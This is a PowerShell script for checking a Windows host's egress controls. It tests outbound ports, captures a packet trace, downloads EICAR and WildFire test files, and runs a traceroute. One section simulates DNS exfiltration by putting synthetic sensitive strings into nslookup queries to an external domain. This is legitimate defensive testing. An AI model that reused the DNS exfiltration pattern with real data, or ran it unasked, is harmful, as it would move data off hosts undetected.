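#Egress Enumeration only via PSv3+ must run with Set-Execution -bypass in CLI for automation
#local admin required for trace capture
#Dennis Chow 05-Dec-2018
#
# Purpose: validate a host's outbound security controls from the inside —
#   1. egress port filtering (TCP connects to portquiz.net on a list of ports)
#   2. DNS-over-TCP exfil detection (lookups whose labels carry DLP-style test values,
#      recorded in an ETW packet trace)
#   3. IPS/AV enforcement on EICAR and WildFire test-file downloads over HTTP/HTTPS
#   4. ICMP traceroute egress
# Console output is colour-coded; tabular results are appended to ps-enum-results.log
# in the current directory and the packet trace is saved as DNSExfil.etl.
# NOTE(review): Test-NetConnection and the NetEventPacketCapture cmdlets ship with
# Windows 8.1 / Server 2012 R2 (PS 4.0); confirm the "PSv3+" claim above on target hosts.
#Args
Param([string]$rhosts)   # accepted for caller compatibility; not used by any check below
$timestamp = Get-Date -f yyyy-MM-dd_HH-mm-ss   # not referenced yet; candidate for unique log/etl names
$dports = @(80,443,8080,666,9090,1024)
# Synthetic DLP trigger values (not real identifiers) used as DNS labels below
$dlpStr = @("ssn", "password", "confidential", "4904-1510-3821-3872", "642-64-4761")
$logFile = "ps-enum-results.log"
$sessionName = "DNSExfil"

#Testing for firewall ports outbound
Write-Host "Testing egress filtering on different ports" -ForegroundColor Yellow -BackgroundColor Black
ForEach ($i in $dports)
{
    # Only successful connects are logged; TcpTestSucceeded is $false for filtered/closed ports
    Test-NetConnection -ComputerName "portquiz.net" -Port $i |
        Where-Object -Property TcpTestSucceeded -EQ $true |
        Format-Table ComputerName, RemoteAddress, RemotePort, TcpTestSucceeded |
        Tee-Object -FilePath $logFile -Append
}
Write-Host "Egress ports Written to ps-enum-results.log" -ForegroundColor Green -BackgroundColor Black

Write-Host "Testing alt-DNS recursion and exfil with DLP chars" -ForegroundColor Yellow -BackgroundColor Black
Write-Host "Starting packet trace..." -ForegroundColor Green -BackgroundColor Black
# The NetEvent session is created by a system service; warn early when not elevated so the
# failure is attributable rather than a confusing CIM error.
$currentIdentity = [Security.Principal.WindowsIdentity]::GetCurrent()
$isAdmin = ([Security.Principal.WindowsPrincipal]$currentIdentity).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
if (-not $isAdmin) {
    Write-Warning "Packet trace requires local admin; the DNS exfil capture will likely fail."
}
#Replacement for Netsh
# NOTE(review): -LocalFilePath is consumed by the NetEvent service, not by this process, so
# a relative path is not guaranteed to land in the script's directory — pass an absolute one.
$etlPath = Join-Path -Path $PWD.Path -ChildPath "DNSExfil.etl"
# A session left over from an aborted run would make New-NetEventSession fail; clear it first.
Get-NetEventSession -Name $sessionName -ErrorAction SilentlyContinue | Remove-NetEventSession
$sessionStarted = $false
try {
    New-NetEventSession -Name $sessionName -CaptureMode SaveToFile -LocalFilePath $etlPath
    # Level 4 = informational; protocols 6/17 = TCP/UDP; filter to the resolver we query
    Add-NetEventPacketCaptureProvider -SessionName $sessionName -Level 4 -CaptureType Physical -IpAddresses 1.1.1.1 -IpProtocols 6,17
    # Without Start-NetEventSession nothing is captured and the .etl stays empty.
    Start-NetEventSession -Name $sessionName
    $sessionStarted = $true
    ForEach ($i in $dlpStr)
    {
        Write-Host "Invoking Fake DNS TCP Port 53 Lookup to CloudFlare $i.xtecsystems.com"
        # -vc forces a TCP (virtual circuit) query so it appears as IP protocol 6 in the trace
        nslookup -vc "$i.xtecsystems.com" 1.1.1.1
    }
}
finally {
    # Tear the session down on every exit path: a running ETW session otherwise keeps
    # capturing after the script dies.
    Write-Host "Stopping packet trace..." -ForegroundColor Red -BackgroundColor Black
    Write-Host "Trace written to: DNSExfil.etl" -ForegroundColor Green -BackgroundColor Black
    if ($sessionStarted) { Stop-NetEventSession -Name $sessionName }
    Remove-NetEventSession -Name $sessionName
}

#Testing IPS AV Policies Enforcement
Write-Host "Testing IPS AV enforcement with EICAR and WildFire..." -ForegroundColor Yellow -BackgroundColor Black
Write-Host "Testing SSL Channel PE and EICAR download" -ForegroundColor Yellow -BackgroundColor Black
# NOTE(review): -PassThru is only valid together with -OutFile (Invoke-WebRequest errors otherwise),
# so it was dropped. Responses stay in memory and are never written to disk; a download blocked
# by the proxy/IPS shows up as an error on the console, not as a row in the log.
# -UseBasicParsing avoids the IE-engine dependency on hosts where IE first-run is incomplete.
Invoke-WebRequest -Uri "https://wildfire.paloaltonetworks.com/publicapi/test/pe" -UseBasicParsing -Verbose | Tee-Object -FilePath $logFile -Append
Invoke-WebRequest -Uri "https://secure.eicar.org/eicar_com.zip" -UseBasicParsing -Verbose | Tee-Object -FilePath $logFile -Append
Write-Host "Testing HTTP Channel PE and EICAR download" -ForegroundColor Yellow -BackgroundColor Black
Invoke-WebRequest -Uri "http://wildfire.paloaltonetworks.com/publicapi/test/pe" -UseBasicParsing -Verbose | Tee-Object -FilePath $logFile -Append
Invoke-WebRequest -Uri "http://2016.eicar.org/download/eicar_com.zip" -UseBasicParsing -Verbose | Tee-Object -FilePath $logFile -Append
Write-Host "Testing REST API Method of Grabbing Test PE Europe and US" -ForegroundColor Yellow -BackgroundColor Black
Invoke-RestMethod -Method Get -Uri "https://eu.wildfire.paloaltonetworks.com/publicapi/test/pe" -Verbose | Tee-Object -FilePath $logFile -Append
Invoke-RestMethod -Method Get -Uri "https://wildfire.paloaltonetworks.com/publicapi/test/pe" -Verbose | Tee-Object -FilePath $logFile -Append

Write-Host "Capturing ICMP traceroute" -ForegroundColor Yellow -BackgroundColor Black
Test-NetConnection -ComputerName microsoft.com -TraceRoute -Hops 16 -Verbose | Tee-Object -FilePath $logFile -Append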